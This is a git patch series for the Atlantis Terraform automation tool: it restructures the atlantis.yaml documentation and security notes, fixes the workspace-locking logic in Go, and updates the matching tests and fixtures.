@@ -0,0 +1,17 @@
+# Apply Requirements
+
+## Approved
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required. If you want to configure this on a per-repo/project basis, for example to only require approvals for your production
+configuration you must use an `atlantis.yaml` file:
+```yaml
+version: 2
+projects:
+- dir: .
+  apply_requirements: [approved]
+```
+
+## Next Steps
+For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+
+For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
index 63f36752ef..029b67e290 100644
--- a/runatlantis.io/docs/atlantis-yaml-reference.md
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -1,45 +1,168 @@
-# Customization
-An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize
-- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply`
-- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply`
-- additional arguments to be supplied to specific terraform commands with `extra_arguments`
-    - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply`
-- what version of Terraform to use (see [Terraform Versions](#terraform-versions))
-
-The schema of the `atlantis.yaml` project config file is
-
-```yaml
-# atlantis.yaml
----
-terraform_version: 0.8.8 # optional version
-# pre_init commands are run when the Terraform version is >= 0.9.0
-pre_init:
-  commands:
-  - "curl http://example.com"
-# pre_get commands are run when the Terraform version is < 0.9.0
-pre_get:
-  commands:
-  - "curl http://example.com"
-pre_plan:
-  commands:
-  - "curl http://example.com"
-post_plan:
-  commands:
-  - "curl http://example.com"
-pre_apply:
-  commands:
-  - "curl http://example.com"
-post_apply:
-  commands:
-  - "curl http://example.com"
-extra_arguments:
-  - command_name: plan
-    arguments:
-    - "-var-file=terraform.tfvars"
-```
-
-When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available
-- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will
-be the value of that argument. Else it will be `default`
-- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8`
-- `DIR`: absolute path to the root of the project on disk
\ No newline at end of file
+# atlantis.yaml Reference
+[[toc]]
+
+::: tip
+`atlantis.yaml` files are only required if you wish to customize some aspect of Atlantis.
+:::
+
+## Example Using All Keys
+```yaml
+version: 2
+projects:
+- name: my-project-name
+  dir: .
+  workspace: default
+  terraform_version: v0.11.0
+  autoplan:
+    when_modified: ["*.tf", "../modules/**.tf"]
+    enabled: true
+  apply_requirements: [approved]
+  workflow: myworkflow
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      - run: my-custom-command arg1 arg2
+      - init
+      - plan:
+          extra_args: ["-lock", "false"]
+      - run: my-custom-command arg1 arg2
+    apply:
+      steps:
+      - run: echo hi
+      - apply
+```
+
+## Usage Notes
+* `atlantis.yaml` files must be placed at the root of the repo
+* The only supported name is `atlantis.yaml`. Not `atlantis.yml` or `.atlantis.yaml`.
+* Once an `atlantis.yaml` file exists in a repo Atlantis will not automatically plan
+any other projects. This means if you have multiple projects in the same repo, once
+you add an `atlantis.yaml` you'll need to add entries for each project.
+* Atlantis uses the `atlantis.yaml` version from the pull request.
+
+## Security
+`atlantis.yaml` files allow users to run arbitrary code on the Atlantis server.
+This is obviously extremely powerful and dangerous since the Atlantis server will
+likely hold your highest privilege credentials.
+
+The risk is increased because Atlantis uses the `atlantis.yaml` file from the
+pull request so anyone that can submit a pull request can submit a malicious file.
+
+As such, **`atlantis.yaml` files should only be enabled in a trusted environment**.
+
+::: danger
+It should be noted that `atlantis apply` itself could be exploited if run on a malicious file. See [Security](security.html#exploits).
+:::
+
+## Reference
+### Top-Level Keys
+```yaml
+version:
+projects:
+workflows:
+```
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| version      | int | none | yes | This key is required and must be set to `2`|
+| projects      | array[[Project](atlantis-yaml-reference.html#project)] | [] | no | Lists the projects in this repo |
+| workflows      | map string -> [Workflow](atlantis-yaml-reference.html#workflow) | {} | no | Custom workflows |
+
+### Project
+```yaml
+name: myname
+dir: mydir
+workspace: myworkspace
+autoplan:
+terraform_version: 0.11.0
+apply_requirements: ["approved"]
+workflow: myworkflow
+```
+
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| name      | string | none | maybe | Required if there is more than one project with the same `dir` and `workspace`. This project name can be used with the `-p` flag.|
+| dir      | string | none | yes | The directory of this project relative to the repo root. Use `.` for the root. For example if the project was under `./project1` then use `project1`|
+| workspace      | string| default | no | The [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) for this project. Atlantis will switch to this workplace when planning/applying and will create it if it doesn't exist.|
+| autoplan      | [Autoplan](atlantis-yaml-reference.html#autoplan) | none | no | A custom autoplan configuration. If not specified, will use the default algorithm. See [Autoplanning](autoplanning.html).|
+| terraform_version      | string | none | no | A specific Terraform version to use when running commands for this project. Requires there to be a binary in the Atlantis `PATH` with the name `terraform{VERSION}`, ex. `terraform0.11.0`|
+| apply_requirements      | array[string] | [] | no | Requirements that must be satisfied before `atlantis apply` can be run. Currently the only supported requirement is `approved`. See [Apply Requirements](apply-requirements.html#approved) for more details.|
+| workflow      | string | none | no | A custom workflow. If not specified, Atlantis will use its default workflow.|
+
+::: tip
+A project represents a Terraform state. Typically, there is one state per directory and workspace however it's possible to
+have multiple states in the same directory using `terraform init -backend-config=custom-config.tfvars`.
+Atlantis supports this but requires the `name` key to be specified. See [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html#custom-backend-config) for more details.
+:::
+
+### Autoplan
+```yaml
+enabled: true
+when_modified: ["*.tf"]
+```
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| enabled      | boolean | true | no | Whether autoplanning is enabled for this project. |
+| when_modified      | array[string] | no | no | Uses [.dockerignore](https://docs.docker.com/engine/reference/builder/#dockerignore-file) syntax. If any modified file in the pull request matches, this project will be planned. If not specified, Atlantis will use its own algorithm. See [Autoplanning](autoplanning.html). Paths are relative to the project's dir.|
+
+### Workflow
+```yaml
+plan:
+apply:
+```
+
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| plan      | [Stage](atlantis-yaml-reference.html#stage) | `steps: [init, plan]` | no | How to plan for this project. |
+| apply      | [Stage](atlantis-yaml-reference.html#stage)  | `steps: [apply]` | no | How to apply for this project. |
+
+### Stage
+```yaml
+steps:
+- run: custom-command
+- init
+- plan:
+    extra_args: [-lock=false]
+```
+
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| steps      | array[[Step](atlantis-yaml-reference.html#step)] | `[]` | no | List of steps for this stage. If the steps key is empty, no steps will be run for this stage. |
+
+### Step
+#### Built-In Command
+Steps can be a single string for a built-in command.
+```yaml
+- init
+- plan
+- apply
+```
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| init/plan/apply      | string | none | no | Use a built-in command without additional configuration. Only `init`, `plan` and `apply` are supported||
+
+#### Built-In Command With Extra Args
+A map from string to `extra_args` for a built-in command with extra arguments.
+```yaml
+- init:
+    extra_args: [arg1, arg2]
+- plan:
+    extra_args: [arg1, arg2]
+- apply:
+    extra_args: [arg1, arg2]
+```
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| init/plan/apply      | map `extra_args` -> array[string] | none | no | Use a built-in command and append `extra_args`. Only `init`, `plan` and `apply` are supported as keys and only `extra_args` is supported as a value||
+#### Custom Command
+Or a custom command
+```yaml
+- run: custom-command
+```
+| Key        | Type | Default           | Required | Description  |
+| -------------| --- |-------------| -----|---|
+| run      | string| "" | no | Run a custom command|
+
+## Next Steps
+Check out the [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html) for
+some real world examples.
diff --git a/runatlantis.io/docs/autoplanning.md b/runatlantis.io/docs/autoplanning.md
new file mode 100644
index 0000000000..92480e0994
--- /dev/null
+++ b/runatlantis.io/docs/autoplanning.md
@@ -0,0 +1,19 @@
+# Autoplanning
+On any **new** pull request or **new commit** to an existing pull request, Atlantis will attempt to
+run `terraform plan` in the directories it thinks hold modified Terraform projects.
+
+The algorithm it uses is as follows:
+1. Get list of all modified files in pull request
+1. Filter to those containing `.tf`
+1. Get the directories that those files are in
+1. If the directory path doesn't contain `modules/` then try to run `plan` in that directory
+1. If it does contain `modules/` look at the directory one level above `modules/`. If it
+contains a `main.tf` run plan in that directory, otherwise ignore the change.
+
+todo: add example
+
+If you would like to configure how Atlantis determines which directory to run in
+or disable it all together you need to create an `atlantis.yaml` file.
+See
+* Disabling Autoplanning
+* Configur
diff --git a/runatlantis.io/docs/security.md b/runatlantis.io/docs/security.md
index 6f66886b37..b26da1e6c2 100644
--- a/runatlantis.io/docs/security.md
+++ b/runatlantis.io/docs/security.md
@@ -1,4 +1,6 @@
 # Security
+[[toc]]
+## Exploits
 Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
 
 Atlantis could be exploited by
@@ -35,3 +37,8 @@ This flag ensures your Atlantis install isn't being used with repositories you d
 Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
 Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
 Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+
+### SSL/HTTPS
+If you're using webhook secrets but your traffic is over HTTP then the webhook secrets
+could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file`
+flags.
diff --git a/runatlantis.io/docs/server-configuration.md b/runatlantis.io/docs/server-configuration.md
index e5c68ca016..27d1f94de6 100644
--- a/runatlantis.io/docs/server-configuration.md
+++ b/runatlantis.io/docs/server-configuration.md
@@ -90,10 +90,3 @@ able to use `session_name = "${var.atlantis_user}"`. However, the backend assume
 role is only used for state-related API actions. Any other API actions will be performed using
 the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
 
-## Approvals
-If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
-By default, no approval is required.
-
-For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
-
-For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
diff --git a/runatlantis.io/guide/atlantis-yaml-use-cases.md b/runatlantis.io/guide/atlantis-yaml-use-cases.md
new file mode 100644
index 0000000000..f01da6fc38
--- /dev/null
+++ b/runatlantis.io/guide/atlantis-yaml-use-cases.md
@@ -0,0 +1,251 @@
+# atlantis.yaml Use Cases
+
+An `atlantis.yaml` file can be placed in the root of each repository to configure
+how Atlantis runs. This documentation describes some use cases.
+
+::: tip
+Looking for the full atlantis.yaml reference? See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+:::
+
+[[toc]]
+
+## Disabling Autoplanning
+```yaml
+version: 2
+projects:
+- dir: project1
+  autoplan:
+    enabled: false
+```
+This will stop Atlantis automatically running plan when `project1/` is updated
+in a pull request.
+
+## Configuring Autoplanning
+Given the directory structure:
+```
+.
+├── modules
+│   └── module1
+│       ├── main.tf
+│       ├── outputs.tf
+│       └── submodule
+│           ├── main.tf
+│           └── outputs.tf
+└── project1
+    └── main.tf
+```
+If you wanted Atlantis to autoplan `project1/` whenever any `.tf` file under `module1/`
+changed, you could use the following configuration:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+  autoplan:
+    when_modified: ["../modules/**/*.tf", "*.tf"]
+```
+Note:
+* `when_modified` uses the [`.dockerignore` syntax](https://docs.docker.com/engine/reference/builder/#dockerignore-file)
+* The paths are relative to the project's directory.
+
+## Supporting Terraform Workspaces
+```yaml
+version: 2
+projects:
+- dir: project1
+  workspace: staging
+- dir: project1
+  workspace: production
+```
+With the above config, when Atlantis determines that the configuration for the `project1` dir has changed,
+it will run plan for both the `staging` and `production` workspaces.
+
+If you want to `plan` or `apply` for a specific workspace you can use
+```
+atlantis plan -w staging -d project1
+```
+and
+```
+atlantis apply -w staging -d project1
+```
+
+## Using .tfvars files
+Given the structure:
+```
+.
+└── project1
+    ├── main.tf
+    ├── production.tfvars
+    └── staging.tfvars
+```
+
+If you wanted Atlantis to automatically run plan with `-var-file staging.tfvars` and `-var-file production.tfvars`
+you could use the following config:
+
+```yaml
+version: 2
+projects:
+# If two or more projects have the same dir and workspace, they must also have
+# a 'name' key to differentiate them.
+- name: project1-staging
+  dir: project1
+  # NOTE: the key here is 'workflow' not 'workspace'
+  workflow: staging
+- name: project1-production
+  dir: project1
+  workflow: production
+
+workflows:
+  staging:
+    plan:
+      steps:
+      - init
+      - plan:
+          extra_args: ["-var-file", "staging.tfvars"]
+  production:
+    plan:
+      steps:
+      - init
+      - plan:
+          extra_args: ["-var-file", "production.tfvars"]
+```
+Here we're defining two projects with the same directory but with different
+`workflow`s.
+
+If you wanted to manually plan one of these projects you could use
+```
+atlantis plan -p project1-staging
+```
+Where `-p` refers to the project name.
+
+When you want to apply the plan, you can run
+```
+atlantis apply -p project1-staging
+```
+
+::: warning Why can't you use atlantis apply -d project1?
+Because Atlantis outputs the plan for both workflows into the `project1` directory
+so it needs a way to differentiate between the plans.
+:::
+
+## Adding extra arguments to Terraform commands
+If you need to append flags to `terraform plan` or `apply` temporarily, you can
+append flags on a comment following `--`, for example commenting:
+```
+atlantis plan -- -lock=false
+```
+Would cause atlantis to run `terraform plan -lock=false`.
+
+If you always need to do this for a project's `init`, `plan` or `apply` commands
+then you must define the project's steps and set the `extra_args` key for the
+command you need to modify.
+
+```yaml
+version: 2
+projects:
+- dir: project1
+  workflow: myworkflow
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      - init:
+          extra_args: ["-lock=false"]
+      - plan:
+          extra_args: ["-lock=false"]
+    apply:
+      steps:
+      - apply:
+          extra_args: ["-lock=false"]
+```
+
+## Running custom commands
+Atlantis supports running custom commands. In this example, we want to run
+a script after every `apply`:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+  workflow: myworkflow
+workflows:
+  myworkflow:
+    apply:
+      steps:
+      - apply
+      - run: ./my-custom-script.sh
+```
+
+::: tip
+Note how we're not specifying the `plan` key under `myworkflow`. If the `plan` key
+isn't set, Atlantis will use the default plan workflow which is what we want in this case.
+:::
+
+## Terraform Versions
+If you'd like to use a different version of Terraform than what is in Atlantis'
+`PATH` then set the `terraform_version` key:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+  terraform_version: 0.10.0
+```
+
+Atlantis will then execute all Terraform commands with `terraform0.10.0` instead
+of `terraform`. This requires that the 0.10.0 binary is in Atlantis's `PATH` with the
+name `terraform0.10.0`.
+
+## Requiring Approvals For Production
+In this example, we only want to require `apply` approvals for the `production` directory.
+```yaml
+version: 2
+projects:
+- dir: staging
+- dir: production
+  apply_requirements: [approved]
+```
+:::tip
+By default, there are no apply requirements so we only need to specify the `apply_requirements` key for production.
+:::
+
+
+## Custom Backend Config
+If you need to specify the `-backend-config` flag to `terraform init` you'll need to use an `atlantis.yaml` file.
+In this example, we're using custom backend files to configure two remote states, one for each environment.
+We're then using `.tfvars` files to load different variables for each environment.
+
+```yaml
+version: 2
+projects:
+- name: staging
+  dir: .
+  workflow: staging
+- name: production
+  dir: .
+  workflow: production
+workflows:
+  staging:
+    plan:
+      steps:
+      - rm -rf .terraform
+      - init:
+          extra_args: [-backend-config=staging.backend.tfvars]
+      - plan:
+          extra_args: [-var-file=staging.tfvars]
+  production:
+    plan:
+      steps:
+      - rm -rf .terraform
+      - init:
+          extra_args: [-backend-config=production.backend.tfvars]
+      - plan:
+          extra_args: [-var-file=production.tfvars]
+```
+::: warning NOTE
+We have to use a custom `run` step to `rm -rf .terraform` because otherwise Terraform
+will complain in-between commands since the backend config has changed.
+:::
+
+## Next Steps
+Check out the full [`atlantis.yaml` Reference](../docs/atlantis-yaml-reference.html) for more details.
\ No newline at end of file
diff --git a/runatlantis.io/guide/requirements.md b/runatlantis.io/guide/requirements.md
index 2edf50c494..0681a0b93e 100644
--- a/runatlantis.io/guide/requirements.md
+++ b/runatlantis.io/guide/requirements.md
@@ -46,7 +46,7 @@ Atlantis supports any Terraform project structures, for example:
         └── ...
 ```
 With modules, if you want `project1` automatically planned when `module1` is modified
-you need to create an `atlantis.yaml` file. See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
+you need to create an `atlantis.yaml` file. See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#configuring-autoplanning) for more details.
 
 ###  Terraform Workspaces
 ::: tip
@@ -54,7 +54,7 @@ See [Terraform's docs](https://www.terraform.io/docs/state/workspaces.html) if y
 :::
 If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through an
 `atlantis.yaml` file that tells Atlantis the names of your workspaces
-(see [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details)
+(see [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#supporting-terraform-workspaces) for more details)
 or through the `-w` flag. For example:
 ```
 atlantis plan -w staging
@@ -71,7 +71,7 @@ atlantis apply -w staging
 ```
 For Atlantis to be able to plan automatically with `.tfvars files`, you need to create
 an `atlantis.yaml` file to tell it to use `-var-file={YOUR_FILE}`.
-See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
+See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#using-tfvars-files) for more details.
 
 ## Terraform Versions
 By default, Atlantis will use the `terraform` executable that is in its path.
@@ -79,7 +79,7 @@ To use a specific version of Terraform:
 1. Install the desired version of Terraform into the `$PATH` of where Atlantis is
  running and name it `terraform{version}`, ex. `terraform0.8.8`.
 2. Create an `atlantis.yaml` file for your repo and set the `terraform_version` key.
-See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html) for more details.
+See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#terraform-versions) for more details.
 
 ## Next Steps
 Check out our [full documentation](../docs/).

From 542a1093fa0dca0b7b5925c8fe4d85c0266af4aa Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 26 Jun 2018 11:49:20 +0200
Subject: [PATCH 51/69] Fix locking

---
 server/events/atlantis_workspace_locker.go    |   5 +-
 .../events/atlantis_workspace_locker_test.go  | 122 ++++++++++++------
 server/events/project_command_builder.go      |   2 +
 server/events_controller_e2e_test.go          |  23 ++--
 .../modules/exp-output-apply-staging.txt.act  |   7 +
 .../modules/exp-output-merge-all-dirs.txt.act |   3 +
 .../modules/exp-output-plan-staging.txt.act   |  31 +++++
 7 files changed, 141 insertions(+), 52 deletions(-)
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act
 create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act

diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go
index b1a3338718..c2c3e61800 100644
--- a/server/events/atlantis_workspace_locker.go
+++ b/server/events/atlantis_workspace_locker.go
@@ -56,12 +56,13 @@ func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace
 	defer d.mutex.Unlock()
 
 	key := d.key(repoFullName, workspace, pullNum)
-	if _, ok := d.locks[key]; !ok {
-		d.locks[key] = true
+	_, exists := d.locks[key]
+	if exists {
 		return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+
 			" command that is running for this pull request–"+
 			"wait until the previous command is complete and try again", workspace)
 	}
+	d.locks[key] = true
 	return func() {
 		d.Unlock(repoFullName, workspace, pullNum)
 	}, nil
diff --git a/server/events/atlantis_workspace_locker_test.go b/server/events/atlantis_workspace_locker_test.go
index 389f1e7df6..ae0e06a990 100644
--- a/server/events/atlantis_workspace_locker_test.go
+++ b/server/events/atlantis_workspace_locker_test.go
@@ -26,91 +26,129 @@ var workspace = "default"
 func TestTryLock(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 
-	t.Log("the first lock should succeed")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-
-	t.Log("now another lock for the same repo, workspace, and pull should fail")
-	Equals(t, false, locker.TryLock(repo, workspace, 1))
+	// The first lock should succeed.
+	unlockFn, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+
+	// Now another lock for the same repo, workspace, and pull should fail
+	_, err = locker.TryLock(repo, workspace, 1)
+	ErrEquals(t, "the default workspace is currently locked by another"+
+		" command that is running for this pull request–"+
+		"wait until the previous command is complete and try again", err)
+
+	// Unlock should work.
+	unlockFn()
+	_, err = locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
 }
 
 func TestTryLockDifferentWorkspaces(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 
 	t.Log("a lock for the same repo and pull but different workspace should succeed")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
+	_, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+	_, err = locker.TryLock(repo, "new-workspace", 1)
+	Ok(t, err)
 
 	t.Log("and both should now be locked")
-	Equals(t, false, locker.TryLock(repo, workspace, 1))
-	Equals(t, false, locker.TryLock(repo, "new-workspace", 1))
+	_, err = locker.TryLock(repo, workspace, 1)
+	Assert(t, err != nil, "exp err")
+	_, err = locker.TryLock(repo, "new-workspace", 1)
+	Assert(t, err != nil, "exp err")
 }
 
 func TestTryLockDifferentRepo(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 
 	t.Log("a lock for a different repo but the same workspace and pull should succeed")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
+	_, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
 	newRepo := "owner/newrepo"
-	Equals(t, true, locker.TryLock(newRepo, workspace, 1))
+	_, err = locker.TryLock(newRepo, workspace, 1)
+	Ok(t, err)
 
 	t.Log("and both should now be locked")
-	Equals(t, false, locker.TryLock(repo, workspace, 1))
-	Equals(t, false, locker.TryLock(newRepo, workspace, 1))
+	_, err = locker.TryLock(repo, workspace, 1)
+	ErrContains(t, "currently locked", err)
+	_, err = locker.TryLock(newRepo, workspace, 1)
+	ErrContains(t, "currently locked", err)
 }
 
-func TestTryLockDifferent1(t *testing.T) {
+func TestTryLockDifferentPulls(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 
 	t.Log("a lock for a different pull but the same repo and workspace should succeed")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	new1 := 2
-	Equals(t, true, locker.TryLock(repo, workspace, new1))
+	_, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+	newPull := 2
+	_, err = locker.TryLock(repo, workspace, newPull)
+	Ok(t, err)
 
 	t.Log("and both should now be locked")
-	Equals(t, false, locker.TryLock(repo, workspace, 1))
-	Equals(t, false, locker.TryLock(repo, workspace, new1))
+	_, err = locker.TryLock(repo, workspace, 1)
+	ErrContains(t, "currently locked", err)
+	_, err = locker.TryLock(repo, workspace, newPull)
+	ErrContains(t, "currently locked", err)
 }
 
 func TestUnlock(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 
 	t.Log("unlocking should work")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	locker.Unlock(repo, workspace, 1)
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
+	unlockFn, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+	unlockFn()
+	_, err = locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
 }
 
 func TestUnlockDifferentWorkspaces(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 	t.Log("unlocking should work for different workspaces")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
-	locker.Unlock(repo, workspace, 1)
-	locker.Unlock(repo, "new-workspace", 1)
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
+	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+	Ok(t, err1)
+	unlockFn2, err2 := locker.TryLock(repo, "new-workspace", 1)
+	Ok(t, err2)
+	unlockFn1()
+	unlockFn2()
+
+	_, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+	_, err = locker.TryLock(repo, "new-workspace", 1)
+	Ok(t, err)
 }
 
 func TestUnlockDifferentRepos(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
 	t.Log("unlocking should work for different repos")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
+	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+	Ok(t, err1)
 	newRepo := "owner/newrepo"
-	Equals(t, true, locker.TryLock(newRepo, workspace, 1))
-	locker.Unlock(repo, workspace, 1)
-	locker.Unlock(newRepo, workspace, 1)
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	Equals(t, true, locker.TryLock(newRepo, workspace, 1))
+	unlockFn2, err2 := locker.TryLock(newRepo, workspace, 1)
+	Ok(t, err2)
+	unlockFn1()
+	unlockFn2()
+
+	_, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+	_, err = locker.TryLock(newRepo, workspace, 1)
+	Ok(t, err)
 }
 
 func TestUnlockDifferentPulls(t *testing.T) {
 	locker := events.NewDefaultAtlantisWorkspaceLocker()
-	t.Log("unlocking should work for different 1s")
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	new1 := 2
-	Equals(t, true, locker.TryLock(repo, workspace, new1))
-	locker.Unlock(repo, workspace, 1)
-	locker.Unlock(repo, workspace, new1)
-	Equals(t, true, locker.TryLock(repo, workspace, 1))
-	Equals(t, true, locker.TryLock(repo, workspace, new1))
+	t.Log("unlocking should work for different pulls")
+	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
+	Ok(t, err1)
+	newPull := 2
+	unlockFn2, err2 := locker.TryLock(repo, workspace, newPull)
+	Ok(t, err2)
+	unlockFn1()
+	unlockFn2()
+
+	_, err := locker.TryLock(repo, workspace, 1)
+	Ok(t, err)
+	_, err = locker.TryLock(repo, workspace, newPull)
+	Ok(t, err)
 }
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 2c82a8724d..6cfee21656 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -40,8 +40,10 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 	workspace := DefaultWorkspace
 	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
 	if err != nil {
+		ctx.Log.Warn("workspace was locked")
 		return nil, err
 	}
+	ctx.Log.Debug("got workspace lock")
 	defer unlockFn()
 
 	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace)
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 85870df845..393c75fd8b 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -429,13 +429,20 @@ func assertCommentEquals(t *testing.T, expFile string, act string, repoDir strin
 	act = idRegex.ReplaceAllString(act, "Creation complete after *s (ID: ******************)")
 
 	if string(exp) != act {
-		actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act")
-		err := ioutil.WriteFile(actFile, []byte(act), 0600)
-		Ok(t, err)
-		cwd, err := os.Getwd()
-		Ok(t, err)
-		rel, err := filepath.Rel(cwd, actFile)
-		Ok(t, err)
-		t.Errorf("%q was different, wrote actual comment to %q", expFile, rel)
+		// If in CI, we write the diff to the console. Otherwise we write the diff
+		// to file so we can use our local diff viewer.
+		if os.Getenv("CI") == "true" {
+			t.Logf("exp: %s, got: %s", string(exp), act)
+			t.FailNow()
+		} else {
+			actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act")
+			err := ioutil.WriteFile(actFile, []byte(act), 0600)
+			Ok(t, err)
+			cwd, err := os.Getwd()
+			Ok(t, err)
+			rel, err := filepath.Rel(cwd, actFile)
+			Ok(t, err)
+			t.Errorf("%q was different, wrote actual comment to %q", expFile, rel)
+		}
 	}
 }
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act
new file mode 100644
index 0000000000..f4282d489d
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act
@@ -0,0 +1,7 @@
+Ran Apply in dir: `staging` workspace: `default`
+**Apply Error**
+```
+no plan found at path "staging" and workspace "default"–did you run plan?
+```
+
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act
new file mode 100644
index 0000000000..4a70e47f39
--- /dev/null
